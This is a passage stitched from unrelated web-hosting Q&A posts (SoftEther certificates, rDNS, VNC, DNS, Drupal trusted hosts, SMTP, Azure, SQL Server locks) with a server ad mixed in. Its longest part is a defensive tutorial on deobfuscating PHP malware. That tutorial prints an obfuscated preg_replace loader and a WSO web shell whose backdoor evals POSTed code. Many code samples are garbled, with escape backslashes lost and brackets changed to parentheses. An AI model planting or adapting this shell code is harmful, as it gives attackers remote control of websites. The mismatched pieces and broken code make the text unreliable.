Can we use CA signed certificate like let’s encrypt in softether vpn server?

I am trying to attach let’s encrypt certificate to my vpn server, But didn’t found a way for it. Can we use CA signed certificate like let’s encrypt in vpn server ? If yes, then please provide the process.

[HostingInside] Taiwan Dedicated Server $50/month !! (Taiwan) | Proxies123.com

E3-1230v2/v3
8GB DDR3 ECC 1600Mhz
1TB Enterprise HDD
1Gbps Premium Network(Not ADSL/FTTB)
No China Premium Network
2500GB Traffic/month(both direction) or 10mbps unmetered(Limited offer)
1 IPv4
Linux(Free)/Windows Server 2008/2012/2016 Standard($25/month)

Coupon Code SPECIALECHER
$50/month – Order Link

Upstream: NTT, FlagTel, HiNet
Peering: TWIX, TPIX, Apple, Facebook, Google, Microsoft
Datacenter: Taipei Internet Exchange, Taiwan
Test IP: 2.58.242.194

 

incident response – I found unknown PHP code on my server. How do I de-obfuscate the code?

Fortunately, almost all PHP scripts can be deobfuscated with 4 simple methods. We’re going to use these four methods to create a canonical answer.

Before we begin, let’s collect a list of common tools that assist in deobfuscating these malicious files so we can do the work ourselves.


Common tools that aid in deobfuscation

  1. UnPHP. This greatly aids in de-obfuscating scripts that have nested obfuscation in excess of 100 nested functions. In many cases, this website, and those like it, should be the first one for you to visit. However, in some cases, UnPHP cannot deobfuscate the initial payload. In those cases, other tools we’ll list will suffice.
  2. PHP Beautifier. This is an excellent tool for splitting up single-line files which are otherwise very difficult to read.
  3. Base64 decoders. I’m linking to Google search for this one. Some of these Base64 websites look kind of shady, so if you prefer to use an offline version without visiting those websites, I whipped up a quick tool for Windows (get Base64Decode.exe). Source code is available as well.
  4. PHP Sandbox. You can also look for other sandboxes on google. We’ll use this to run echo commands when needed.

Commonly exploited PHP functions

The vast majority of hacks are using some form of eval, or preg_place, or both:

  1. eval(). This can be an evil function, as it allows arbitrary execution of PHP code. Just finding this function in use on your website could be an indication that you’ve been hacked.
  2. preg_replace(). Frequently used with eval() to allow for arbitrary code execution. There are plenty of good uses for preg_replace(), but if you don’t know how it got there, and especially if it appears alongside obfuscated code, that’s a clear indication that you’ve been hacked.
  3. Additional Information. To prevent this answer from becoming too large, I’m going to link to this question about commonly-exploited PHP functions.
  4. Also, check out the OWASP PHP Cheat Sheet.

While base64_decode is used in nearly all of the hacks we’ve come across, it mainly serves as a layer of obfuscation.


Common obsfuscation formats

There are several different ways that hackers obfuscate their code. Let’s list some of the common techniques so we know how to spot them and then decode them:

  1. Hex Encoding. You’ll be looking for the HEX number on that table list. In PHP, these can be represented by backslash x, followed by a number or letter. Examples:

    • x48 = H
    • x34 = 4
    • x78 = x

    However, they aren’t necessarily represented only by x. They could be # as well.

  2. Unicode strings. Almost the same as above, but u# instead of x#. Examples:

    • u004D = M
    • u0065 = e
    • u0020 = (space)
    • u0070 = p
    • u006c = l
    • u0073 = s
  3. Base64 encoding. Base64 is a bit different than the aforementioned methods of obfuscation, but is still relatively easy to decode. Example strings:

    • SSBsaWtlIGRvbnV0cw== = I like donuts
    • ZXZhbChiYXNlNjRfZGVjb2RlKCJoYXgiKSk7 = eval(base64_decode("hax"));
    • QXNzdW1pbmcgZGlyZWN0IGNvbnRyb2w= = Assuming direct control
  4. Garbage stored in a string, split by for loops, regex, etc. You’ll have to decode that yourself, as they vary considerably. Fortunately, many of the aforementioned methods should assist you in de-obfuscating this time.


How can I deobfuscate PHP Files by myself?

Because we cannot help (we can, I can, but they won’t let me! :P) with every single PHP malware snippet out there, it would be better to teach you how to do it.

Learning how to do this yourself will help you learn more about PHP, and more about what’s going on. Let’s put our tools to use, and use two previous examples of PHP deobfuscation on this website.


Deobfuscation Example #1

Refer to this question. Copy and paste the code into UnPHP:

<?php preg_replace("xf4x3041x1fx16351x42x45"^"xd730xf64773125340","373x49145xa9372xc0x72331307320175237xb412351x6cx69x6dx72302xe1117x67x8644xc7217x64260x31x78x99x9c200x4"^"2734013312x96265x16xbcx98xbfx13374xd1x7bx4b1532x8104xf6xbe532345113xa3352114x92155111xbbxb525177","20665x30x2f160x277x56x25x9axfx6xec317xebx10x86x0244364255x57x53xf3x8dxb913x5c2272xc5x97215347372x83x74367x28x2exd1x36x72177223x3cxb2x1ax96271127x3b337xcf277317xb74214271xb223571xa6x3d20532512733670xd6x7c"^"3127x58131x12x5515214615125076166210207x9bx22xdf127xccx9exe1144x11302324324x73x2c133213374xf8xe9240313xf0x38305x6ex54xb24x24x4f360105213152xf4xee64x4d275x88206xa1325x35265xc3xd0xca177xd5x5fxc6xe040274x55xb5x41"); ?>

And you’ll see it doesn’t deobfuscate it for us. Bummer. We’re going to have to do some extra work. Note the strings, along with it’s concatenations. Argh! It’s so ugly and confusing! What are we going to do with these strings? This is where the PHP sandbox comes into play.

<?php
    echo "xf4x3041x1fx16351x42x45"^"xd730xf64773125340" . "<br/>"; 
    echo "373x49145xa9372xc0x72331307320175237xb412351x6cx69x6dx72302xe1117x67x8644xc7217x64260x31x78x99x9c200x4"^"2734013312x96265x16xbcx98xbfx13374xd1x7bx4b1532x8104xf6xbe532345113xa3352114x92155111xbbxb525177" . "<br/>";
    echo "20665x30x2f160x277x56x25x9axfx6xec317xebx10x86x0244364255x57x53xf3x8dxb913x5c2272xc5x97215347372x83x74367x28x2exd1x36x72177223x3cxb2x1ax96271127x3b337xcf277317xb74214271xb223571xa6x3d20532512733670xd6x7c"^"3127x58131x12x5515214615125076166210207x9bx22xdf127xccx9exe1144x11302324324x73x2c133213374xf8xe9240313xf0x38305x6ex54xb24x24x4f360105213152xf4xee64x4d275x88206xa1325x35265xc3xd0xca177xd5x5fxc6xe040274x55xb5x41" . "<br/>";
?>

Now that we’ve echo’d the contents, we can rebuild it to get the following results:

<?php 
    preg_replace("#(.+)#ie", "@include_once(base64_decode("1"));",
    "L2hvbWU0L21pdHp2YWhjL3B1YmxpY19odG1sL2Fzc2V0cy9pbWcvbG9nb19zbWFsbC5wbmc"; 
?>

Note the string, L2hvbWU0L21pdHp2YWhjL3B1YmxpY19odG1sL2Fzc2V0cy9pbWcvbG9nb19zbWFsbC5wbmc? That looks an awful lot like the Base64 encoding we talked about earlier! Let’s try to decode it and see if we’re right:

/home4/mitzvahc/public_html/assets/img/logo_small.png

After opening the logo_small.png file in some kind of text editor, we find something like this:

eval(gzuncompress(base64_decode("evil_payload")));

Oh no!!!

OH NO!!!

If you run the file contents through UnPHP, you should get your decoded results.


Deobfuscation Example #2

Refer to this question:

Remember earlier when we mentioned ASCII encoding? Take a look at the code:

<?php 
    ${"x47LOBx41x4cx53"}("x76x72vwx65yx70x7anx69x70x75")="a";${"x47x4cOBALx53"}("x67x72x69ux65x66x62x64x71c")="x61x75x74hx5fpasx73";${"x47x4cOBALx53"}("x63x74xvx74x6fx6fx6bnx6dju")="x76";${"x47x4cOx42Ax4cS"}("px69x6fykcx65x61")="defx61ulx74x5fux73x65_x61jx61x78";${"x47x4cx4fx42x41x4cx53"}("ix77ix72x6dx78lx71tvx79p")="defax75x6cx74x5fx61x63tx69x6fx6e";${"x47Lx4fBx41x4cS"}("x64x77ex6dx62x6ax63")="x63x6flx6fx72";${${"x47x4cx4fx42x41LS"}("x64x77x65x6dbjx63")}="x23dx665";${${"x47Lx4fBx41x4cx53"}("x69x77x69rmx78x6cx71x74x76x79p")}="x46ix6cesMx61n";$oboikuury="x64ex66ax75x6ctx5fcx68x61x72x73x65t";${${"x47Lx4fx42x41x4cS"}("px69oyx6bcx65x61")}=true;${$oboikuury}="x57indowx73-1x325x31";@ini_set("x65rx72ox72_x6cog",NULL);@ini_set("lx6fg_erx72ors",0);@ini_set("max_exx65x63x75x74x69ox6ex5fx74imx65",0);@set_time_limit(0);@set_magic_quotes_runtime(0);@define("WSx4fx5fVEx52Sx49ON","x32.5x2e1");if(get_magic_quotes_gpc()){function WSOstripslashes($array){${"x47x4cx4fx42Ax4cx53"}("x7ax64x69zx62x73x75ex66a")="x61x72rx61x79";$cfnrvu="x61rx72ax79";${"GLOBx41Lx53"}("x6bx63x6ctx6cx70x64x73")="ax72x72x61x79";return is_array(${${"x47x4cOx42x41x4cx53"}("x7adx69x7abx73x75ex66x61")})?array_map("x57SOstx72x69x70x73x6cx61x73x68x65s",${${"x47x4cOx42x41LS"}("x6bx63x6cx74lx70x64x73")}):stripslashes(${$cfnrvu});}$_POST=WSOstripslashes($_POST);$_COOKIE=WSOstripslashes($_COOKIE);}function wsoLogin(){header("x48x54TP/1.x30x204x30x34x20x4eox74 x46ound");die("4x304");}function WSOsetcookie($k,$v){${"x47x4cOx42ALS"}("x67vfx6cx78mx74")="x6b";$cjtmrt="x76";$_COOKIE(${${"Gx4cx4fx42x41LS"}("x67x76x66x6cxmx74")})=${${"GLOx42x41x4cS"}("x63x74x78x76tx6fx6fknmx6ax75")};$raogrsixpi="x6b";setcookie(${$raogrsixpi},${$cjtmrt});}$qyvsdolpq="ax75x74x68x5fx70x61sx73";if(!empty(${$qyvsdolpq})){$rhavvlolc="aux74h_x70ax73x73";$ssfmrro="ax75tx68x5fpax73x73";if(isset($_POST("px61ss"))&&(md5($_POST("pax73x73"))==${$ssfmrro}))WSOsetcookie(md5($_SERVER("Hx54x54P_x48x4fx53T")),${${"x47Lx4fx42x41x4cx53"}("x67x72x69x75ex66bx64x71x63")});if(!isset($_COOKIE(md5($_SERVER("x48Tx54x50x5fx48Ox53x54"))))||($_COOKIE(md5($_SERVER("Hx54x54x50_Hx4fST")))!=${$rhavvlolc}))wsoLogin();}function actionRC(){if(!@$_POST("px31")){$ugtfpiyrum="a";${${"x47x4cx4fBx41LS"}("x76rx76wx65x79x70zx6eipu")}=array("x75nx61mx65"=>php_uname(),"px68x70x5fverx73x69ox6e"=>phpversion(),"x77sx6f_vx65x72six6fx6e"=>WSO_VERSION,"safx65mx6fx64e"=>@ini_get("x73x61x66x65x5fmx6fdx65"));echo serialize(${$ugtfpiyrum});}else{eval($_POST("x70x31"));}}if(empty($_POST("x61"))){${"x47Lx4fBx41LS"}("x69sx76x65x78x79")="x64x65x66x61x75x6ctx5fx61cx74ix6fx6e";${"x47x4cx4fx42x41x4cx53"}("x75x6fx65cx68x79x6dx7adx64x64")="x64x65x66ax75x6cx74_x61x63x74x69x6fn";if(isset(${${"x47Lx4fx42x41LS"}("x69x77irx6dx78lqtvx79x70")})&&function_exists("x61ctx69x6fx6e".${${"x47Lx4fx42x41x4cS"}("x75ox65chx79x6dx7ax64x64x64")}))$_POST("a")=${${"x47x4cx4fx42ALS"}("ix73x76ex78x79")};else$_POST("a")="x53ex63x49x6ex66o";}if(!empty($_POST("x61"))&&function_exists("actiox6e".$_POST("x61")))call_user_func("x61x63x74x69x6fx6e".$_POST("a"));exit;
?>

Let’s copy and paste this into UnPHP. Once the results are in, we can finally see what it’s doing, but it looks all smashed together. Let’s paste it into the PHP Beautifier. Now it’s a lot easier to read!


Deobfuscating variable names

If you’re not able to deobfuscate variable names through any of the previously-mentioned methods, then deobfuscating those variable names can be a manual, time-consuming process. Fortunately, looking for common malware patterns such as shutting off the log files, using eval() or preg_replace() with obfuscation indicates that something is wrong.

Obfuscation is the wrong approach, so if you find code obfuscated on your website, you should assume you’ve been hacked. You should not be obfuscating your code. Security at the expense of usability is not security.


Deobfuscation Risks

Trying to decode these files on your own web server is not safe for a lot of reasons, some of which may be unknown to us. Do not try to deobfuscate PHP files on your own web server. You could inadvertently introduce additional backdoors, or assist the malware in spreading itself because many of the scripts load functions remotely.


That’s nice, but how did I get hacked?

This is really too broad to answer without us having access to everything on your web server, including logs.

You may have incorrect hardening on your Content Management System (CMS) installation, or there may be a vulnerability somewhere in your web stack. You can check these links if they’re part of your CMS:

  1. Joomla Security Checklist
  2. WordPress Hardening
  3. Drupal Security Checklist

If your CMS isn’t listed, look for hardening/security checklists for your CMS installation. If you are not using a CMS, but rather your own code, then it’s on you to fix your security holes. The OWASP Cheat Sheet serves as a good starting point to finding and fixing common vulnerabilities. Remember, only you can prevent shell access.

There could be any number of reasons why this is happening… but the bottom line is: either your web host has been hacked, or you have an exploit on your website which allows malicious individuals to insert additional code and give them full control over your website… meanwhile, they are attacking your visitors.


So what do I do?!

You should read this Q&A: How do I deal with a compromised server?

email server – reverse DNS for shared hosting

I have a VPS, I installed cwp on it to creat hosts. this VPS has one IP, I shared this IP in 5 hosts, I maid rDNS for this IP, rDNS address is rdns.aminrezaie.com to IP 192.119.70.158 and it is working correctly, I have a host on this vps and its connected to another domain, and that domain is aasal.cash. The problem is when I try to send mail from aasal.cash mails, first it goes to spam, I checked more and tried more, I fixed mxtoolbox.com problems but no chance, at last, I got that IP of vps is connected to rdns.aminrezaie.com and maybe it is because of that, and I can’t change that rDNS. is there any way to configure an IP address of shared host to multiple rDNS?

lubuntu – TurboVPN for ubuntu server and set the only avaibile desktop to be xfce4 for all users

I am setting up a new Ubuntu server for several users
My target is every one could connect it with the TurboVPN by the server IP when user login to it, it will show the login screen to users and enter or choose the user name and then they can get their own desktop environment

Here are my questions:

1)the lightdm.conf seems can use (VNCserver) to generate the login screen for users so that users can login by the ip address without adding :1 :2 etc, but I only could achieve with the default vnc (tightvnc?), how could I change to TurboVPN? because it is called by /opt/Turbo/bin/vncserver the (VNCserver)in lightdm seems could not call turboVPN directly by that command

2)I have tried to manually create the vnc server and when I login to it , it is the lubuntu desktop ,how could I change all the users default desktop to be xfce4 at once and limit all users from VNC only could use it?

thank you for helping

domain name system – Static website I am hosting cannot be reached and the server IP cannot be found

I recently used Google Domains to register a domain and have connected it to Google Cloud Console to manage a static website. I followed the Google Codelabs guide to set it up and faced no issues. However, when refreshing my website, it still doesn’t load and my browser (Chrome) gives me the following error message:

This site can’t be reached

carbonfootprint.dev’s server IP address could not be found.”

As well, going to www.carbonfootprint.dev gives me another error message:

Your connection is not private

Attackers might be trying to steal your information from www.carbonfootprint.dev (for example, passwords, messages, or credit cards).

NET::ERR_CERT_COMMON_NAME_INVALID

…Which is confusing, because I was under the impression that a .dev domain suffix gives SSL certification by default.

However, in my Google Domains settings, the website content appears as it should in the minimized preview that exists in both the Domain Overview panel and Website panel. It has been over 48 hours, so it should have updated by now if it were just a delay issue.

For reference, this is what my Custom resource records look like, and these are my bucket details in Google Cloud Console. If it matters, I am also using a Mac.

Any help is much appreciated!

8 – What does “The provided host name is not valid for this server” mean?

This error message is coming from a feature that was added to Drupal 8 to protect against HTTP Host header attacks. The feature is also described in the change record that was generated for the patch.

Essentially, it was possible to spoof the HTTP Host header for nefarious purposes, and trick Drupal into using a different domain name in several subsystems (particularly link generation). In other words, the HTTP Host header needs to be considered user input, and not trusted.

To combat this, a new setting, $settings('trusted_host_patterns'), was added to Drupal 8 to configure a list of “trusted” hostnames that the site can run from. The setting needs to be an array of regular expression patterns, without delimiters, representing the hostnames you would like to allow to run from.

For example, if you are running your site from a single hostname “www.example.com”, then you should add this to your settings (usually found at ./sites/default/settings.php):

$settings('trusted_host_patterns') = array(
  '^www.example.com$',
);

Note the ^, ., and $. These are PCRE Syntax. These just mean that you want to match “www.example.com” precisely, with nothing extra at the beginning and end, and that the dots should be treated as dots and not wildcard characters.

If you are running from “example.com”, then just use:

$settings('trusted_host_patterns') = array(
  '^example.com$',
);

If you need to run a site of multiple domains and/or subdomains, and are not doing canonical URL redirection, then your setting would look something like this:

$settings('trusted_host_patterns') = array(
  '^example.com$',
  '^.+.example.com$',
  '^example.org',
  '^.+.example.org',
);

This allows the site to run off of all variants of example.com and example.org, with all subdomains included.

Once you adjust $settings('trusted_host_patterns') to the proper value, you should be able to browse to your site again.

You can also check on the status of your trusted host settings from the status report page, which is at admin/reports/status

If you remove the setting altogether, the trusted host mechanism will not be used, and you will see an error on the status report page. In addition, your site may also be vulnerable HTTP Host header attacks.

If you have this setting configured and are seeing this message, then it probably means you have messed up the regular expression syntax. In this case, take the first example, and copy/paste into your settings, and then edit it to reflect the hostname your site runs from.

email – 550 Please turn on SMTP Authentication in your mail client. server without authentication

I got this message on my Gmail when i sent to my zoho prefessional mail
i check all MX , CNAME

Everything is alright, it work perfectly on my web form , but not on gmail when sending an email to my
Zoho mail.

On my Track EMail Delivery :
Rejected relay attempt:………

Can someone have this problem before
help ?

Enable PHP logging in Azure App Server (WebApp)

This has been asked a handful of times, but in 2020 the accepted solution doesn’t appear to work. I have uploaded my PHP files to /site/wwwroot and inside the same wwwroot created a php.ini file with only one line entry:

display_errors=On

I also created an App Setting for my WebApp, as below – Key name PHP_INI_SCAN_DIR and value as shown below:

enter image description here

The website has been restarted. Still no PHP errors displaying. I get a blank page.

locking – SQL Server: When is a real shared (S, not IS) lock acquired on a page of a clustered index?

All the explanations I find seem to indicate that, without special hints – which is the case in our software -, shared locks are only acquired for keys, with IS locks at page and object level (and, yes, an S lock on the database).

Lock escalation of S row (key) locks escalates to the table (object) level, so no S page locks can result from this, if I’m correct here.

And foreign key constraint checking also gets (transaction-wide) S locks on keys, if I understand it correctly (see my other question for this).

However, we see lots of S (not IS) page locks in a simple ETL process (doing simple UPDATEs/INSERTs and some DELETEs from a connected server) – where could they come from?

Thanks!
Harald M.